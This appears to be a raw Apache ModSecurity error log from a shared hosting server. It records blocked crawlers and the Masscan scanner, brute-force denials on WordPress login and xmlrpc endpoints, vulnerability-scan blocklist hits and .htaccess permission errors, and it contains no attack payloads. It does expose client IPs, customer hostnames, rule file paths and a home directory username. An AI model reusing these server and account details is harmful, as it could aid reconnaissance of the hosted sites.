[Tue May 26 17:39:50.171639 2026] [security2:error] [pid 912729:tid 912880] [client 54.39.6.220:21624] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.siliconelevators.in"] [uri "/"] [unique_id "ahWNjkoCupl_NMj3qz-R3AAAAJo"]
[Tue May 26 17:39:50.171743 2026] [security2:error] [pid 912729:tid 912880] [client 54.39.6.220:21624] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.siliconelevators.in"] [uri "/"] [unique_id "ahWNjkoCupl_NMj3qz-R3AAAAJo"]
[Tue May 26 17:39:50.425604 2026] [security2:error] [pid 912729:tid 912987] [client 223.235.98.214:10100] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWNjkoCupl_NMj3qz-R7QAAAQM"]
[Tue May 26 17:39:50.425734 2026] [security2:error] [pid 912729:tid 912987] [client 223.235.98.214:10100] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWNjkoCupl_NMj3qz-R7QAAAQM"]
[Tue May 26 17:39:50.690031 2026] [security2:error] [pid 912729:tid 912948] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNjkoCupl_NMj3qz-R4AAAANw"]
[Tue May 26 17:39:51.286685 2026] [security2:error] [pid 912729:tid 912801] [remote 211.23.68.235:11755] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWNj0oCupl_NMj3qz-SFwAA8kc"]
[Tue May 26 17:39:53.042691 2026] [security2:error] [pid 912729:tid 912936] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNkEoCupl_NMj3qz-SaAAAANA"]
[Tue May 26 17:39:55.368744 2026] [security2:error] [pid 912729:tid 912943] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNkkoCupl_NMj3qz-S6wAAANc"]
[Tue May 26 17:39:58.474335 2026] [security2:error] [pid 912729:tid 912947] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNlkoCupl_NMj3qz-TmAAAANs"]
[Tue May 26 17:39:59.082115 2026] [security2:error] [pid 912729:tid 912899] [client 103.123.226.10:61001] ModSecurity: Warning. Match of "ipMatch 127.0.0.1,::1" against "REMOTE_ADDR" required. [file "/etc/httpd/modsecurity.d/00_asl_zz_strict.conf"] [line "82"] [id "331030"] [rev "2"] [msg "Atomicorp.com WAF Rules: Suspicious activity detected - HTTP Request Missing a Host Header"] [severity "NOTICE"] [tag "no_ar"] [hostname "md-74.webhostbox.net"] [uri "/"] [unique_id "ahWNl0oCupl_NMj3qz-T1wAAAKs"]
[Tue May 26 17:39:59.253713 2026] [security2:error] [pid 912729:tid 912899] [client 103.123.226.10:61001] ModSecurity: Warning. Matched phrase "Masscan" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahWNl0oCupl_NMj3qz-T1wAAAKs"]
[Tue May 26 17:39:59.957276 2026] [security2:error] [pid 912729:tid 912947] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNl0oCupl_NMj3qz-T9QAAANs"]
[Tue May 26 17:40:01.363209 2026] [security2:error] [pid 912729:tid 912972] [client 223.235.98.214:20115] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWNmUoCupl_NMj3qz-UVAAAAPQ"]
[Tue May 26 17:40:01.364396 2026] [security2:error] [pid 912729:tid 912972] [client 223.235.98.214:20115] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWNmUoCupl_NMj3qz-UVAAAAPQ"]
[Tue May 26 17:40:02.493048 2026] [security2:error] [pid 912729:tid 912967] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNmkoCupl_NMj3qz-UhQAAAO8"]
[Tue May 26 17:40:03.991248 2026] [security2:error] [pid 912729:tid 912902] [client 195.178.110.48:40104] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.thegoodsporting.com"] [uri "/"] [unique_id "ahWNm0oCupl_NMj3qz-U_wAAAK4"]
[Tue May 26 17:40:04.797899 2026] [security2:error] [pid 912729:tid 912904] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNnEoCupl_NMj3qz-VGAAAALA"]
[Tue May 26 17:40:07.542045 2026] [security2:error] [pid 912729:tid 912976] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNn0oCupl_NMj3qz-VswAAAPg"]
[Tue May 26 17:40:08.772592 2026] [security2:error] [pid 912729:tid 912835] [remote 163.61.60.30:42132] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.60.61.163.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWNoEoCupl_NMj3qz-WEwAA9Wk"]
[Tue May 26 17:40:09.038671 2026] [security2:error] [pid 912729:tid 912984] [client 103.123.226.10:61001] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahWNoEoCupl_NMj3qz-WJAAAAQA"]
[Tue May 26 17:40:09.777988 2026] [security2:error] [pid 912729:tid 912937] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNoUoCupl_NMj3qz-WQAAAANE"]
[Tue May 26 17:40:11.775348 2026] [security2:error] [pid 912729:tid 912950] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNo0oCupl_NMj3qz-WrAAAAN4"]
[Tue May 26 17:40:12.461239 2026] [security2:error] [pid 912729:tid 912964] [client 223.235.98.214:30643] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWNpEoCupl_NMj3qz-W6wAAAOw"]
[Tue May 26 17:40:12.461367 2026] [security2:error] [pid 912729:tid 912964] [client 223.235.98.214:30643] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWNpEoCupl_NMj3qz-W6wAAAOw"]
[Tue May 26 17:40:13.852312 2026] [security2:error] [pid 912729:tid 912769] [remote 178.104.164.71:57432] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.164.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWNpUoCupl_NMj3qz-XOAABBCc"]
[Tue May 26 17:40:15.055346 2026] [security2:error] [pid 912729:tid 912908] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNpkoCupl_NMj3qz-XawAAALQ"]
[Tue May 26 17:40:16.085405 2026] [security2:error] [pid 912729:tid 912943] [client 103.123.226.10:61001] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahWNp0oCupl_NMj3qz-XxAAAANc"]
[Tue May 26 17:40:16.259406 2026] [security2:error] [pid 912729:tid 912899] [client 146.19.156.18:49836] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWNp0oCupl_NMj3qz-XsgAAAKs"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 17:40:16.359276 2026] [security2:error] [pid 912729:tid 912871] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNp0oCupl_NMj3qz-XuwAAAJE"]
[Tue May 26 17:40:17.196702 2026] [security2:error] [pid 912729:tid 912809] [remote 216.73.216.30:2010] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWNqUoCupl_NMj3qz-X6wAA0E8"]
[Tue May 26 17:40:17.287610 2026] [security2:error] [pid 912729:tid 912822] [remote 216.73.216.30:2010] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWNqUoCupl_NMj3qz-X7AAA0Fw"]
[Tue May 26 17:40:17.833735 2026] [security2:error] [pid 912729:tid 912812] [remote 216.73.216.30:2010] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWNqUoCupl_NMj3qz-YBQAA0FI"]
[Tue May 26 17:40:18.198783 2026] [security2:error] [pid 912729:tid 912835] [remote 216.73.216.30:2010] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWNqkoCupl_NMj3qz-YGAAA0Gk"]
[Tue May 26 17:40:18.713615 2026] [core:crit] [pid 912729:tid 912913] (13)Permission denied: [client 207.46.13.6:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:40:19.446031 2026] [security2:error] [pid 912729:tid 912862] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNqkoCupl_NMj3qz-YQwAAAIg"]
[Tue May 26 17:40:19.564369 2026] [security2:error] [pid 912729:tid 912827] [remote 216.73.216.30:2010] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWNq0oCupl_NMj3qz-YYgAA0GE"]
[Tue May 26 17:40:19.656517 2026] [security2:error] [pid 912729:tid 912838] [remote 216.73.216.30:2010] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWNq0oCupl_NMj3qz-YZgAA0Gw"]
[Tue May 26 17:40:20.295652 2026] [security2:error] [pid 912729:tid 912837] [remote 216.73.216.30:2010] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWNrEoCupl_NMj3qz-YggAA0Gs"]
[Tue May 26 17:40:20.387114 2026] [security2:error] [pid 912729:tid 912738] [remote 216.73.216.30:2010] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWNrEoCupl_NMj3qz-YgwAA0Ag"]
[Tue May 26 17:40:20.478165 2026] [security2:error] [pid 912729:tid 912747] [remote 216.73.216.30:2010] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWNrEoCupl_NMj3qz-YigAA0BE"]
[Tue May 26 17:40:21.114849 2026] [security2:error] [pid 912729:tid 912848] [remote 216.73.216.30:2010] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWNrUoCupl_NMj3qz-YogAA6XY"]
[Tue May 26 17:40:21.473162 2026] [security2:error] [pid 912729:tid 912879] [client 185.251.19.120:52771] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 120.19.251.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWNrUoCupl_NMj3qz-YrAAAAJk"]
[Tue May 26 17:40:21.642494 2026] [security2:error] [pid 912729:tid 912932] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNrUoCupl_NMj3qz-YqwAAAMw"]
[Tue May 26 17:40:22.660528 2026] [security2:error] [pid 912729:tid 912733] [remote 209.42.18.223:36396] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.18.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWNrkoCupl_NMj3qz-Y0AAA5gM"]
[Tue May 26 17:40:23.347640 2026] [core:crit] [pid 912729:tid 912907] (13)Permission denied: [client 40.77.167.13:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:40:23.511804 2026] [core:crit] [pid 912729:tid 912970] (13)Permission denied: [client 40.77.167.13:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:40:23.542257 2026] [security2:error] [pid 912729:tid 912854] [remote 74.7.241.58:34392] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWNr0oCupl_NMj3qz-Y7AAArHw"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/mosykay.com/account/lang/en
[Tue May 26 17:40:23.666677 2026] [security2:error] [pid 912729:tid 912947] [client 223.235.98.214:22329] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWNr0oCupl_NMj3qz-Y8QAAANs"]
[Tue May 26 17:40:23.666773 2026] [security2:error] [pid 912729:tid 912947] [client 223.235.98.214:22329] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWNr0oCupl_NMj3qz-Y8QAAANs"]
[Tue May 26 17:40:23.840158 2026] [core:crit] [pid 912729:tid 912876] (13)Permission denied: [client 40.77.167.13:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:40:24.028474 2026] [security2:error] [pid 912729:tid 912913] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNr0oCupl_NMj3qz-Y8AAAALk"]
[Tue May 26 17:40:24.219553 2026] [core:crit] [pid 912729:tid 912948] (13)Permission denied: [client 40.77.167.13:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:40:25.110828 2026] [security2:error] [pid 912729:tid 912935] [client 103.123.226.10:61001] ModSecurity: Warning. Match of "ipMatch 127.0.0.1,::1" against "REMOTE_ADDR" required. [file "/etc/httpd/modsecurity.d/00_asl_zz_strict.conf"] [line "82"] [id "331030"] [rev "2"] [msg "Atomicorp.com WAF Rules: Suspicious activity detected - HTTP Request Missing a Host Header"] [severity "NOTICE"] [tag "no_ar"] [hostname "thedebateafrica.org"] [uri "/"] [unique_id "ahWNsUoCupl_NMj3qz-ZGgAAAM8"]
[Tue May 26 17:40:25.111458 2026] [proxy:warn] [pid 912729:tid 912935] [client 103.123.226.10:61001] AH01092: no HTTP 0.9 request (with no host line) on incoming request and preserve host set forcing hostname to be thedebateafrica.org for uri /
[Tue May 26 17:40:25.116650 2026] [security2:error] [pid 912729:tid 912935] [client 103.123.226.10:61001] ModSecurity: Warning. Matched phrase "Masscan" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "thedebateafrica.org"] [uri "/"] [unique_id "ahWNsUoCupl_NMj3qz-ZGgAAAM8"]
[Tue May 26 17:40:26.267988 2026] [security2:error] [pid 912729:tid 912951] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNsUoCupl_NMj3qz-ZMQAAAN8"]
[Tue May 26 17:40:27.589142 2026] [core:crit] [pid 912729:tid 912906] (13)Permission denied: [client 40.77.167.42:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:40:28.893691 2026] [security2:error] [pid 912729:tid 912932] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNtEoCupl_NMj3qz-ZaQAAAMw"]
[Tue May 26 17:40:30.871220 2026] [security2:error] [pid 912729:tid 912882] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNtkoCupl_NMj3qz-ZmQAAAJw"]
[Tue May 26 17:40:32.275195 2026] [security2:error] [pid 912729:tid 912908] [client 103.123.226.10:61001] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahWNuEoCupl_NMj3qz-ZwgAAALQ"]
[Tue May 26 17:40:32.928954 2026] [security2:error] [pid 912729:tid 912911] [client 85.208.96.204:32710] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-kids-care/list/"] [unique_id "ahWNuEoCupl_NMj3qz-Z4wAAALc"]
[Tue May 26 17:40:32.929090 2026] [security2:error] [pid 912729:tid 912911] [client 85.208.96.204:32710] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-kids-care/list/"] [unique_id "ahWNuEoCupl_NMj3qz-Z4wAAALc"]
[Tue May 26 17:40:33.318160 2026] [security2:error] [pid 912729:tid 912869] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNuEoCupl_NMj3qz-Z3wAAAI8"]
[Tue May 26 17:40:33.743696 2026] [security2:error] [pid 912729:tid 912791] [remote 216.73.216.30:56003] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWNuUoCupl_NMj3qz-Z8wAA5j0"]
[Tue May 26 17:40:33.752720 2026] [security2:error] [pid 912729:tid 912761] [remote 216.73.216.30:56003] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWNuUoCupl_NMj3qz-Z9gAA5h8"]
[Tue May 26 17:40:33.844351 2026] [security2:error] [pid 912729:tid 912789] [remote 216.73.216.30:56003] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWNuUoCupl_NMj3qz-Z-wAA5js"]
